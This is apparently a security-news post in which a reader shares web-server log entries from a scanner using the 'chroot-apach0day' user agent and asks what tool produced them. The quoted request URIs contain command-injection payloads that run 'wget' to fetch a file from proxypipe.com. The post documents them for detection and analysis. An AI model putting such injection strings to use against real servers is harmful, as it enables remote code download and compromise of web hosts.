Our reader Robin submitted the following detect: I’ve got a site that was scanned this morning by a tool that left these entries in the logs: [HTTP_USER_AGENT] => chroot-apach0day [HTTP_REFERRER] => /xA/x0a/x05 [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day Â The URL that appears to be retrieved does not exist, even though the domain does. In our own web logs, we have seen a couple of similar requests: 22.214.171.124 – - [28/Jul/2014:05:07:15 +0000] “GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day” “-” 126.96.36.199 – - [28/Jul/2014:18:48:36 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day” “-” 188.8.131.52 – - [28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-” If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn’t look like this is indeed an “Apache 0 Day”Â There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.Read More...
- Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th) July 28, 2014
- Probably not a good idea to read this if you are a #CISO July 28, 2014
- SB14-209: Vulnerability Summary for the Week of July 21, 2014 July 28, 2014
- Don't believe the hype: here are 4 common #infosec oversights July 28, 2014
- KPMG says this chaos is making it easier, a LOT easier, for our enemies to #hack into our systems. Sad but true. July 28, 2014
Tagsapi apple archives article browser bruce schneier business china copyright development director downloads education enterprise events facebook feeds gfi government hackers hacking industry internet linkedin linux management mcafee microsoft network networks news opinion phishing podcasts science security social-media symantec team cyrmu technology united-kingdom united-states videos vulnerability windows